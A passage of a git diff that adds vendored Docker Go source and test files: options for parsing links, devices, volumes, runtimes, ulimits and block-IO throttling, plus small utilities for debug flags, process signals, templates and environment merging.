+	if len(config.Env) != len(env) {
+		t.Fatalf("Expected a config with %d env variables, got %v: %v", len(env), len(config.Env), config.Env)
+	}
+	for i, v := range env {
+		if config.Env[i] != v {
+			t.Fatalf("Expected a config with [%s], got %v", v, []byte(config.Env[i]))
+		}
+	}
+
+	// UTF16 with BOM
+	e := "contains invalid utf8 bytes at line"
+	if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) {
+		t.Fatalf("Expected an error with message '%s', got %v", e, err)
+	}
+	// UTF16BE with BOM
+	if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16be.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) {
+		t.Fatalf("Expected an error with message '%s', got %v", e, err)
+	}
+}
+
+func TestParseLabelfileVariables(t *testing.T) {
+	e := "open nonexistent: no such file or directory"
+	if runtime.GOOS == "windows" {
+		e = "open nonexistent: The system cannot find the file specified."
+	}
+	// label ko
+	if _, _, _, err := parseRun([]string{"--label-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e {
+		t.Fatalf("Expected an error with message '%s', got %v", e, err)
+	}
+	// label ok
+	config, _, _, err := parseRun([]string{"--label-file=fixtures/valid.label", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(config.Labels) != 1 || config.Labels["LABEL1"] != "value1" {
+		t.Fatalf("Expected a config with [LABEL1:value1], got %v", config.Labels)
+	}
+	config, _, _, err = parseRun([]string{"--label-file=fixtures/valid.label", "--label=LABEL2=value2", "img", "cmd"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(config.Labels) != 2 || config.Labels["LABEL1"] != "value1" || config.Labels["LABEL2"] != "value2" {
+		t.Fatalf("Expected a config with [LABEL1:value1 LABEL2:value2], got %v", config.Labels)
+	}
+}
+
+func TestParseEntryPoint(t *testing.T) {
+	config, _, _, err := parseRun([]string{"--entrypoint=anything", "cmd", "img"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(config.Entrypoint) != 1 && config.Entrypoint[0] != "anything" {
+		t.Fatalf("Expected entrypoint 'anything', got %v", config.Entrypoint)
+	}
+}
+
+func TestValidateLink(t *testing.T) {
+	valid := []string{
+		"name",
+		"dcdfbe62ecd0:alias",
+		"7a67485460b7642516a4ad82ecefe7f57d0c4916f530561b71a50a3f9c4e33da",
+		"angry_torvalds:linus",
+	}
+	invalid := map[string]string{
+		"":               "empty string specified for links",
+		"too:much:of:it": "bad format for links: too:much:of:it",
+	}
+
+	for _, link := range valid {
+		if _, err := ValidateLink(link); err != nil {
+			t.Fatalf("ValidateLink(`%q`) should succeed: error %q", link, err)
+		}
+	}
+
+	for link, expectedError := range invalid {
+		if _, err := ValidateLink(link); err == nil {
+			t.Fatalf("ValidateLink(`%q`) should have failed validation", link)
+		} else {
+			if !strings.Contains(err.Error(), expectedError) {
+				t.Fatalf("ValidateLink(`%q`) error should contain %q", link, expectedError)
+			}
+		}
+	}
+}
+
+func TestParseLink(t *testing.T) {
+	name, alias, err := ParseLink("name:alias")
+	if err != nil {
+		t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err)
+	}
+	if name != "name" {
+		t.Fatalf("Link name should have been name, got %s instead", name)
+	}
+	if alias != "alias" {
+		t.Fatalf("Link alias should have been alias, got %s instead", alias)
+	}
+	// short format definition
+	name, alias, err = ParseLink("name")
+	if err != nil {
+		t.Fatalf("Expected not to error out on a valid name only format but got: %v", err)
+	}
+	if name != "name" {
+		t.Fatalf("Link name should have been name, got %s instead", name)
+	}
+	if alias != "name" {
+		t.Fatalf("Link alias should have been name, got %s instead", alias)
+	}
+	// empty string link definition is not allowed
+	if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") {
+		t.Fatalf("Expected error 'empty string specified for links' but got: %v", err)
+	}
+	// more than two colons are not allowed
+	if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") {
+		t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err)
+	}
+}
+
+func TestValidateDevice(t *testing.T) {
+	valid := []string{
+		"/home",
+		"/home:/home",
+		"/home:/something/else",
+		"/with space",
+		"/home:/with space",
+		"relative:/absolute-path",
+		"hostPath:/containerPath:r",
+		"/hostPath:/containerPath:rw",
+		"/hostPath:/containerPath:mrw",
+	}
+	invalid := map[string]string{
+		"":        "bad format for path: ",
+		"./":      "./ is not an absolute path",
+		"../":     "../ is not an absolute path",
+		"/:../":   "../ is not an absolute path",
+		"/:path":  "path is not an absolute path",
+		":":       "bad format for path: :",
+		"/tmp:":   " is not an absolute path",
+		":test":   "bad format for path: :test",
+		":/test":  "bad format for path: :/test",
+		"tmp:":    " is not an absolute path",
+		":test:":  "bad format for path: :test:",
+		"::":      "bad format for path: ::",
+		":::":     "bad format for path: :::",
+		"/tmp:::": "bad format for path: /tmp:::",
+		":/tmp::": "bad format for path: :/tmp::",
+		"path:ro": "ro is not an absolute path",
+		"path:rr": "rr is not an absolute path",
+		"a:/b:ro": "bad mode specified: ro",
+		"a:/b:rr": "bad mode specified: rr",
+	}
+
+	for _, path := range valid {
+		if _, err := ValidateDevice(path); err != nil {
+			t.Fatalf("ValidateDevice(`%q`) should succeed: error %q", path, err)
+		}
+	}
+
+	for path, expectedError := range invalid {
+		if _, err := ValidateDevice(path); err == nil {
+			t.Fatalf("ValidateDevice(`%q`) should have failed validation", path)
+		} else {
+			if err.Error() != expectedError {
+				t.Fatalf("ValidateDevice(`%q`) error should contain %q, got %q", path, expectedError, err.Error())
+			}
+		}
+	}
+}
+
+func TestVolumeSplitN(t *testing.T) {
+	for _, x := range []struct {
+		input    string
+		n        int
+		expected []string
+	}{
+		{`C:\foo:d:`, -1, []string{`C:\foo`, `d:`}},
+		{`:C:\foo:d:`, -1, nil},
+		{`/foo:/bar:ro`, 3, []string{`/foo`, `/bar`, `ro`}},
+		{`/foo:/bar:ro`, 2, []string{`/foo`, `/bar:ro`}},
+		{`C:\foo\:/foo`, -1, []string{`C:\foo\`, `/foo`}},
+
+		{`d:\`, -1, []string{`d:\`}},
+		{`d:`, -1, []string{`d:`}},
+		{`d:\path`, -1, []string{`d:\path`}},
+		{`d:\path with space`, -1, []string{`d:\path with space`}},
+		{`d:\pathandmode:rw`, -1, []string{`d:\pathandmode`, `rw`}},
+		{`c:\:d:\`, -1, []string{`c:\`, `d:\`}},
+		{`c:\windows\:d:`, -1, []string{`c:\windows\`, `d:`}},
+		{`c:\windows:d:\s p a c e`, -1, []string{`c:\windows`, `d:\s p a c e`}},
+		{`c:\windows:d:\s p a c e:RW`, -1, []string{`c:\windows`, `d:\s p a c e`, `RW`}},
+		{`c:\program files:d:\s p a c e i n h o s t d i r`, -1, []string{`c:\program files`, `d:\s p a c e i n h o s t d i r`}},
+		{`0123456789name:d:`, -1, []string{`0123456789name`, `d:`}},
+		{`MiXeDcAsEnAmE:d:`, -1, []string{`MiXeDcAsEnAmE`, `d:`}},
+		{`name:D:`, -1, []string{`name`, `D:`}},
+		{`name:D::rW`, -1, []string{`name`, `D:`, `rW`}},
+		{`name:D::RW`, -1, []string{`name`, `D:`, `RW`}},
+		{`c:/:d:/forward/slashes/are/good/too`, -1, []string{`c:/`, `d:/forward/slashes/are/good/too`}},
+		{`c:\Windows`, -1, []string{`c:\Windows`}},
+		{`c:\Program Files (x86)`, -1, []string{`c:\Program Files (x86)`}},
+
+		{``, -1, nil},
+		{`.`, -1, []string{`.`}},
+		{`..\`, -1, []string{`..\`}},
+		{`c:\:..\`, -1, []string{`c:\`, `..\`}},
+		{`c:\:d:\:xyzzy`, -1, []string{`c:\`, `d:\`, `xyzzy`}},
+
+		// Cover directories with one-character name
+		{`/tmp/x/y:/foo/x/y`, -1, []string{`/tmp/x/y`, `/foo/x/y`}},
+	} {
+		res := volumeSplitN(x.input, x.n)
+		if len(res) < len(x.expected) {
+			t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res)
+		}
+		for i, e := range res {
+			if e != x.expected[i] {
+				t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/runtime.go b/vendor/github.com/docker/docker/runconfig/opts/runtime.go
new file mode 100644
index 0000000000..4361b3ce09
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/runtime.go
@@ -0,0 +1,79 @@
+package opts
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+)
+
+// RuntimeOpt defines a map of Runtimes
+type RuntimeOpt struct {
+	name             string
+	stockRuntimeName string
+	values           *map[string]types.Runtime
+}
+
+// NewNamedRuntimeOpt creates a new RuntimeOpt
+func NewNamedRuntimeOpt(name string, ref *map[string]types.Runtime, stockRuntime string) *RuntimeOpt {
+	if ref == nil {
+		ref = &map[string]types.Runtime{}
+	}
+	return &RuntimeOpt{name: name, values: ref, stockRuntimeName: stockRuntime}
+}
+
+// Name returns the name of the NamedListOpts in the configuration.
+func (o *RuntimeOpt) Name() string {
+	return o.name
+}
+
+// Set validates and updates the list of Runtimes
+func (o *RuntimeOpt) Set(val string) error {
+	parts := strings.SplitN(val, "=", 2)
+	if len(parts) != 2 {
+		return fmt.Errorf("invalid runtime argument: %s", val)
+	}
+
+	parts[0] = strings.TrimSpace(parts[0])
+	parts[1] = strings.TrimSpace(parts[1])
+	if parts[0] == "" || parts[1] == "" {
+		return fmt.Errorf("invalid runtime argument: %s", val)
+	}
+
+	parts[0] = strings.ToLower(parts[0])
+	if parts[0] == o.stockRuntimeName {
+		return fmt.Errorf("runtime name '%s' is reserved", o.stockRuntimeName)
+	}
+
+	if _, ok := (*o.values)[parts[0]]; ok {
+		return fmt.Errorf("runtime '%s' was already defined", parts[0])
+	}
+
+	(*o.values)[parts[0]] = types.Runtime{Path: parts[1]}
+
+	return nil
+}
+
+// String returns Runtime values as a string.
+func (o *RuntimeOpt) String() string {
+	var out []string
+	for k := range *o.values {
+		out = append(out, k)
+	}
+
+	return fmt.Sprintf("%v", out)
+}
+
+// GetMap returns a map of Runtimes (name: path)
+func (o *RuntimeOpt) GetMap() map[string]types.Runtime {
+	if o.values != nil {
+		return *o.values
+	}
+
+	return map[string]types.Runtime{}
+}
+
+// Type returns the type of the option
+func (o *RuntimeOpt) Type() string {
+	return "runtime"
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go
new file mode 100644
index 0000000000..5024324298
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go
@@ -0,0 +1,111 @@
+package opts
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/api/types/blkiodev"
+	"github.com/docker/go-units"
+)
+
+// ValidatorThrottleFctType defines a validator function that returns a validated struct and/or an error.
+type ValidatorThrottleFctType func(val string) (*blkiodev.ThrottleDevice, error)
+
+// ValidateThrottleBpsDevice validates that the specified string has a valid device-rate format.
+func ValidateThrottleBpsDevice(val string) (*blkiodev.ThrottleDevice, error) {
+	split := strings.SplitN(val, ":", 2)
+	if len(split) != 2 {
+		return nil, fmt.Errorf("bad format: %s", val)
+	}
+	if !strings.HasPrefix(split[0], "/dev/") {
+		return nil, fmt.Errorf("bad format for device path: %s", val)
+	}
+	rate, err := units.RAMInBytes(split[1])
+	if err != nil {
+		return nil, fmt.Errorf("invalid rate for device: %s. The correct format is <device-path>:<number>[<unit>]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val)
+	}
+	if rate < 0 {
+		return nil, fmt.Errorf("invalid rate for device: %s. The correct format is <device-path>:<number>[<unit>]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val)
+	}
+
+	return &blkiodev.ThrottleDevice{
+		Path: split[0],
+		Rate: uint64(rate),
+	}, nil
+}
+
+// ValidateThrottleIOpsDevice validates that the specified string has a valid device-rate format.
+func ValidateThrottleIOpsDevice(val string) (*blkiodev.ThrottleDevice, error) {
+	split := strings.SplitN(val, ":", 2)
+	if len(split) != 2 {
+		return nil, fmt.Errorf("bad format: %s", val)
+	}
+	if !strings.HasPrefix(split[0], "/dev/") {
+		return nil, fmt.Errorf("bad format for device path: %s", val)
+	}
+	rate, err := strconv.ParseUint(split[1], 10, 64)
+	if err != nil {
+		return nil, fmt.Errorf("invalid rate for device: %s. The correct format is <device-path>:<number>. Number must be a positive integer", val)
+	}
+	if rate < 0 {
+		return nil, fmt.Errorf("invalid rate for device: %s. The correct format is <device-path>:<number>. Number must be a positive integer", val)
+	}
+
+	return &blkiodev.ThrottleDevice{
+		Path: split[0],
+		Rate: uint64(rate),
+	}, nil
+}
+
+// ThrottledeviceOpt defines a map of ThrottleDevices
+type ThrottledeviceOpt struct {
+	values    []*blkiodev.ThrottleDevice
+	validator ValidatorThrottleFctType
+}
+
+// NewThrottledeviceOpt creates a new ThrottledeviceOpt
+func NewThrottledeviceOpt(validator ValidatorThrottleFctType) ThrottledeviceOpt {
+	values := []*blkiodev.ThrottleDevice{}
+	return ThrottledeviceOpt{
+		values:    values,
+		validator: validator,
+	}
+}
+
+// Set validates a ThrottleDevice and sets its name as a key in ThrottledeviceOpt
+func (opt *ThrottledeviceOpt) Set(val string) error {
+	var value *blkiodev.ThrottleDevice
+	if opt.validator != nil {
+		v, err := opt.validator(val)
+		if err != nil {
+			return err
+		}
+		value = v
+	}
+	(opt.values) = append((opt.values), value)
+	return nil
+}
+
+// String returns ThrottledeviceOpt values as a string.
+func (opt *ThrottledeviceOpt) String() string {
+	var out []string
+	for _, v := range opt.values {
+		out = append(out, v.String())
+	}
+
+	return fmt.Sprintf("%v", out)
+}
+
+// GetList returns a slice of pointers to ThrottleDevices.
+func (opt *ThrottledeviceOpt) GetList() []*blkiodev.ThrottleDevice {
+	var throttledevice []*blkiodev.ThrottleDevice
+	throttledevice = append(throttledevice, opt.values...)
+
+	return throttledevice
+}
+
+// Type returns the option type
+func (opt *ThrottledeviceOpt) Type() string {
+	return "throttled-device"
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go b/vendor/github.com/docker/docker/runconfig/opts/ulimit.go
new file mode 100644
index 0000000000..5adfe30851
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/ulimit.go
@@ -0,0 +1,57 @@
+package opts
+
+import (
+	"fmt"
+
+	"github.com/docker/go-units"
+)
+
+// UlimitOpt defines a map of Ulimits
+type UlimitOpt struct {
+	values *map[string]*units.Ulimit
+}
+
+// NewUlimitOpt creates a new UlimitOpt
+func NewUlimitOpt(ref *map[string]*units.Ulimit) *UlimitOpt {
+	if ref == nil {
+		ref = &map[string]*units.Ulimit{}
+	}
+	return &UlimitOpt{ref}
+}
+
+// Set validates a Ulimit and sets its name as a key in UlimitOpt
+func (o *UlimitOpt) Set(val string) error {
+	l, err := units.ParseUlimit(val)
+	if err != nil {
+		return err
+	}
+
+	(*o.values)[l.Name] = l
+
+	return nil
+}
+
+// String returns Ulimit values as a string.
+func (o *UlimitOpt) String() string {
+	var out []string
+	for _, v := range *o.values {
+		out = append(out, v.String())
+	}
+
+	return fmt.Sprintf("%v", out)
+}
+
+// GetList returns a slice of pointers to Ulimits.
+func (o *UlimitOpt) GetList() []*units.Ulimit {
+	var ulimits []*units.Ulimit
+	for _, v := range *o.values {
+		ulimits = append(ulimits, v)
+	}
+
+	return ulimits
+}
+
+// Type returns the option type
+func (o *UlimitOpt) Type() string {
+	return "ulimit"
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go b/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go
new file mode 100644
index 0000000000..0aa3facdfb
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go
@@ -0,0 +1,42 @@
+package opts
+
+import (
+	"testing"
+
+	"github.com/docker/go-units"
+)
+
+func TestUlimitOpt(t *testing.T) {
+	ulimitMap := map[string]*units.Ulimit{
+		"nofile": {"nofile", 1024, 512},
+	}
+
+	ulimitOpt := NewUlimitOpt(&ulimitMap)
+
+	expected := "[nofile=512:1024]"
+	if ulimitOpt.String() != expected {
+		t.Fatalf("Expected %v, got %v", expected, ulimitOpt)
+	}
+
+	// Valid ulimit append to opts
+	if err := ulimitOpt.Set("core=1024:1024"); err != nil {
+		t.Fatal(err)
+	}
+
+	// Invalid ulimit type returns an error and do not append to opts
+	if err := ulimitOpt.Set("notavalidtype=1024:1024"); err == nil {
+		t.Fatalf("Expected error on invalid ulimit type")
+	}
+	expected = "[nofile=512:1024 core=1024:1024]"
+	expected2 := "[core=1024:1024 nofile=512:1024]"
+	result := ulimitOpt.String()
+	if result != expected && result != expected2 {
+		t.Fatalf("Expected %v or %v, got %v", expected, expected2, ulimitOpt)
+	}
+
+	// And test GetList
+	ulimits := ulimitOpt.GetList()
+	if len(ulimits) != 2 {
+		t.Fatalf("Expected a ulimit list of 2, got %v", ulimits)
+	}
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go
new file mode 100644
index 0000000000..2a5da6da08
--- /dev/null
+++ b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go
@@ -0,0 +1,89 @@
+package opts
+
+import (
+	"fmt"
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/api/types/blkiodev"
+)
+
+// ValidatorWeightFctType defines a validator function that returns a validated struct and/or an error.
+type ValidatorWeightFctType func(val string) (*blkiodev.WeightDevice, error)
+
+// ValidateWeightDevice validates that the specified string has a valid device-weight format.
+func ValidateWeightDevice(val string) (*blkiodev.WeightDevice, error) {
+	split := strings.SplitN(val, ":", 2)
+	if len(split) != 2 {
+		return nil, fmt.Errorf("bad format: %s", val)
+	}
+	if !strings.HasPrefix(split[0], "/dev/") {
+		return nil, fmt.Errorf("bad format for device path: %s", val)
+	}
+	weight, err := strconv.ParseUint(split[1], 10, 0)
+	if err != nil {
+		return nil, fmt.Errorf("invalid weight for device: %s", val)
+	}
+	if weight > 0 && (weight < 10 || weight > 1000) {
+		return nil, fmt.Errorf("invalid weight for device: %s", val)
+	}
+
+	return &blkiodev.WeightDevice{
+		Path:   split[0],
+		Weight: uint16(weight),
+	}, nil
+}
+
+// WeightdeviceOpt defines a map of WeightDevices
+type WeightdeviceOpt struct {
+	values    []*blkiodev.WeightDevice
+	validator ValidatorWeightFctType
+}
+
+// NewWeightdeviceOpt creates a new WeightdeviceOpt
+func NewWeightdeviceOpt(validator ValidatorWeightFctType) WeightdeviceOpt {
+	values := []*blkiodev.WeightDevice{}
+	return WeightdeviceOpt{
+		values:    values,
+		validator: validator,
+	}
+}
+
+// Set validates a WeightDevice and sets its name as a key in WeightdeviceOpt
+func (opt *WeightdeviceOpt) Set(val string) error {
+	var value *blkiodev.WeightDevice
+	if opt.validator != nil {
+		v, err := opt.validator(val)
+		if err != nil {
+			return err
+		}
+		value = v
+	}
+	(opt.values) = append((opt.values), value)
+	return nil
+}
+
+// String returns WeightdeviceOpt values as a string.
+func (opt *WeightdeviceOpt) String() string {
+	var out []string
+	for _, v := range opt.values {
+		out = append(out, v.String())
+	}
+
+	return fmt.Sprintf("%v", out)
+}
+
+// GetList returns a slice of pointers to WeightDevices.
+func (opt *WeightdeviceOpt) GetList() []*blkiodev.WeightDevice {
+	var weightdevice []*blkiodev.WeightDevice
+	for _, v := range opt.values {
+		weightdevice = append(weightdevice, v)
+	}
+
+	return weightdevice
+}
+
+// Type returns the option type
+func (opt *WeightdeviceOpt) Type() string {
+	return "weighted-device"
+}
diff --git a/vendor/github.com/docker/docker/utils/debug.go b/vendor/github.com/docker/docker/utils/debug.go
new file mode 100644
index 0000000000..d203891129
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/debug.go
@@ -0,0 +1,26 @@
+package utils
+
+import (
+	"os"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// EnableDebug sets the DEBUG env var to true
+// and makes the logger to log at debug level.
+func EnableDebug() {
+	os.Setenv("DEBUG", "1")
+	logrus.SetLevel(logrus.DebugLevel)
+}
+
+// DisableDebug sets the DEBUG env var to false
+// and makes the logger to log at info level.
+func DisableDebug() {
+	os.Setenv("DEBUG", "")
+	logrus.SetLevel(logrus.InfoLevel)
+}
+
+// IsDebugEnabled checks whether the debug flag is set or not.
+func IsDebugEnabled() bool {
+	return os.Getenv("DEBUG") != ""
+}
diff --git a/vendor/github.com/docker/docker/utils/debug_test.go b/vendor/github.com/docker/docker/utils/debug_test.go
new file mode 100644
index 0000000000..6f9c4dfbb0
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/debug_test.go
@@ -0,0 +1,43 @@
+package utils
+
+import (
+	"os"
+	"testing"
+
+	"github.com/Sirupsen/logrus"
+)
+
+func TestEnableDebug(t *testing.T) {
+	defer func() {
+		os.Setenv("DEBUG", "")
+		logrus.SetLevel(logrus.InfoLevel)
+	}()
+	EnableDebug()
+	if os.Getenv("DEBUG") != "1" {
+		t.Fatalf("expected DEBUG=1, got %s\n", os.Getenv("DEBUG"))
+	}
+	if logrus.GetLevel() != logrus.DebugLevel {
+		t.Fatalf("expected log level %v, got %v\n", logrus.DebugLevel, logrus.GetLevel())
+	}
+}
+
+func TestDisableDebug(t *testing.T) {
+	DisableDebug()
+	if os.Getenv("DEBUG") != "" {
+		t.Fatalf("expected DEBUG=\"\", got %s\n", os.Getenv("DEBUG"))
+	}
+	if logrus.GetLevel() != logrus.InfoLevel {
+		t.Fatalf("expected log level %v, got %v\n", logrus.InfoLevel, logrus.GetLevel())
+	}
+}
+
+func TestDebugEnabled(t *testing.T) {
+	EnableDebug()
+	if !IsDebugEnabled() {
+		t.Fatal("expected debug enabled, got false")
+	}
+	DisableDebug()
+	if IsDebugEnabled() {
+		t.Fatal("expected debug disabled, got true")
+	}
+}
diff --git a/vendor/github.com/docker/docker/utils/names.go b/vendor/github.com/docker/docker/utils/names.go
new file mode 100644
index 0000000000..632062819c
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/names.go
@@ -0,0 +1,9 @@
+package utils
+
+import "regexp"
+
+// RestrictedNameChars collects the characters allowed to represent a name, normally used to validate container and volume names.
+const RestrictedNameChars = `[a-zA-Z0-9][a-zA-Z0-9_.-]`
+
+// RestrictedNamePattern is a regular expression to validate names against the collection of restricted characters.
+var RestrictedNamePattern = regexp.MustCompile(`^` + RestrictedNameChars + `+$`)
diff --git a/vendor/github.com/docker/docker/utils/process_unix.go b/vendor/github.com/docker/docker/utils/process_unix.go
new file mode 100644
index 0000000000..fc0b1c8b74
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/process_unix.go
@@ -0,0 +1,22 @@
+// +build linux freebsd solaris
+
+package utils
+
+import (
+	"syscall"
+)
+
+// IsProcessAlive returns true if process with a given pid is running.
+func IsProcessAlive(pid int) bool {
+	err := syscall.Kill(pid, syscall.Signal(0))
+	if err == nil || err == syscall.EPERM {
+		return true
+	}
+
+	return false
+}
+
+// KillProcess force-stops a process.
+func KillProcess(pid int) {
+	syscall.Kill(pid, syscall.SIGKILL)
+}
diff --git a/vendor/github.com/docker/docker/utils/process_windows.go b/vendor/github.com/docker/docker/utils/process_windows.go
new file mode 100644
index 0000000000..03cb855197
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/process_windows.go
@@ -0,0 +1,20 @@
+package utils
+
+// IsProcessAlive returns true if process with a given pid is running.
+func IsProcessAlive(pid int) bool {
+	// TODO Windows containerd. Not sure this is needed
+	//	p, err := os.FindProcess(pid)
+	//	if err == nil {
+	//		return true
+	//	}
+	return false
+}
+
+// KillProcess force-stops a process.
+func KillProcess(pid int) {
+	// TODO Windows containerd. Not sure this is needed
+	//	p, err := os.FindProcess(pid)
+	//	if err == nil {
+	//		p.Kill()
+	//	}
+}
diff --git a/vendor/github.com/docker/docker/utils/templates/templates.go b/vendor/github.com/docker/docker/utils/templates/templates.go
new file mode 100644
index 0000000000..91c376f38f
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/templates/templates.go
@@ -0,0 +1,42 @@
+package templates
+
+import (
+	"encoding/json"
+	"strings"
+	"text/template"
+)
+
+// basicFunctions are the set of initial
+// functions provided to every template.
+var basicFunctions = template.FuncMap{
+	"json": func(v interface{}) string {
+		a, _ := json.Marshal(v)
+		return string(a)
+	},
+	"split": strings.Split,
+	"join":  strings.Join,
+	"title": strings.Title,
+	"lower": strings.ToLower,
+	"upper": strings.ToUpper,
+	"pad":   padWithSpace,
+}
+
+// Parse creates a new annonymous template with the basic functions
+// and parses the given format.
+func Parse(format string) (*template.Template, error) {
+	return NewParse("", format)
+}
+
+// NewParse creates a new tagged template with the basic functions
+// and parses the given format.
+func NewParse(tag, format string) (*template.Template, error) {
+	return template.New(tag).Funcs(basicFunctions).Parse(format)
+}
+
+// padWithSpace adds whitespace to the input if the input is non-empty
+func padWithSpace(source string, prefix, suffix int) string {
+	if source == "" {
+		return source
+	}
+	return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix)
+}
diff --git a/vendor/github.com/docker/docker/utils/templates/templates_test.go b/vendor/github.com/docker/docker/utils/templates/templates_test.go
new file mode 100644
index 0000000000..dd42901aed
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/templates/templates_test.go
@@ -0,0 +1,38 @@
+package templates
+
+import (
+	"bytes"
+	"testing"
+)
+
+func TestParseStringFunctions(t *testing.T) {
+	tm, err := Parse(`{{join (split . ":") "/"}}`)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	var b bytes.Buffer
+	if err := tm.Execute(&b, "text:with:colon"); err != nil {
+		t.Fatal(err)
+	}
+	want := "text/with/colon"
+	if b.String() != want {
+		t.Fatalf("expected %s, got %s", want, b.String())
+	}
+}
+
+func TestNewParse(t *testing.T) {
+	tm, err := NewParse("foo", "this is a {{ . }}")
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	var b bytes.Buffer
+	if err := tm.Execute(&b, "string"); err != nil {
+		t.Fatal(err)
+	}
+	want := "this is a string"
+	if b.String() != want {
+		t.Fatalf("expected %s, got %s", want, b.String())
+	}
+}
diff --git a/vendor/github.com/docker/docker/utils/utils.go b/vendor/github.com/docker/docker/utils/utils.go
new file mode 100644
index 0000000000..d3dd00abf4
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/utils.go
@@ -0,0 +1,87 @@
+package utils
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"runtime"
+	"strings"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+var globalTestID string
+
+// TestDirectory creates a new temporary directory and returns its path.
+// The contents of directory at path `templateDir` is copied into the
+// new directory.
+func TestDirectory(templateDir string) (dir string, err error) {
+	if globalTestID == "" {
+		globalTestID = stringid.GenerateNonCryptoID()[:4]
+	}
+	prefix := fmt.Sprintf("docker-test%s-%s-", globalTestID, GetCallerName(2))
+	if prefix == "" {
+		prefix = "docker-test-"
+	}
+	dir, err = ioutil.TempDir("", prefix)
+	if err = os.Remove(dir); err != nil {
+		return
+	}
+	if templateDir != "" {
+		if err = archive.CopyWithTar(templateDir, dir); err != nil {
+			return
+		}
+	}
+	return
+}
+
+// GetCallerName introspects the call stack and returns the name of the
+// function `depth` levels down in the stack.
+func GetCallerName(depth int) string {
+	// Use the caller function name as a prefix.
+	// This helps trace temp directories back to their test.
+	pc, _, _, _ := runtime.Caller(depth + 1)
+	callerLongName := runtime.FuncForPC(pc).Name()
+	parts := strings.Split(callerLongName, ".")
+	callerShortName := parts[len(parts)-1]
+	return callerShortName
+}
+
+// ReplaceOrAppendEnvValues returns the defaults with the overrides either
+// replaced by env key or appended to the list
+func ReplaceOrAppendEnvValues(defaults, overrides []string) []string {
+	cache := make(map[string]int, len(defaults))
+	for i, e := range defaults {
+		parts := strings.SplitN(e, "=", 2)
+		cache[parts[0]] = i
+	}
+
+	for _, value := range overrides {
+		// Values w/o = means they want this env to be removed/unset.
+		if !strings.Contains(value, "=") {
+			if i, exists := cache[value]; exists {
+				defaults[i] = "" // Used to indicate it should be removed
+			}
+			continue
+		}
+
+		// Just do a normal set/update
+		parts := strings.SplitN(value, "=", 2)
+		if i, exists := cache[parts[0]]; exists {
+			defaults[i] = value
+		} else {
+			defaults = append(defaults, value)
+		}
+	}
+
+	// Now remove all entries that we want to "unset"
+	for i := 0; i < len(defaults); i++ {
+		if defaults[i] == "" {
+			defaults = append(defaults[:i], defaults[i+1:]...)
+			i--
+		}
+	}
+
+	return defaults
+}
diff --git a/vendor/github.com/docker/docker/utils/utils_test.go b/vendor/github.com/docker/docker/utils/utils_test.go
new file mode 100644
index 0000000000..ab3911e8b3
--- /dev/null
+++ b/vendor/github.com/docker/docker/utils/utils_test.go
@@ -0,0 +1,21 @@
+package utils
+
+import "testing"
+
+func TestReplaceAndAppendEnvVars(t *testing.T) {
+	var (
+		d = []string{"HOME=/"}
+		o = []string{"HOME=/root", "TERM=xterm"}
+	)
+
+	env := ReplaceOrAppendEnvValues(d, o)
+	if len(env) != 2 {
+		t.Fatalf("expected len of 2 got %d", len(env))
+	}
+	if env[0] != "HOME=/root" {
+		t.Fatalf("expected HOME=/root got '%s'", env[0])
+	}
+	if env[1] != "TERM=xterm" {
+		t.Fatalf("expected TERM=xterm got '%s'", env[1])
+	}
+}
diff --git a/vendor/github.com/docker/docker/vendor.conf b/vendor/github.com/docker/docker/vendor.conf
new file mode 100644
index 0000000000..bb7718bc42
--- /dev/null
+++ b/vendor/github.com/docker/docker/vendor.conf
@@ -0,0 +1,140 @@
+# the following lines are in sorted order, FYI
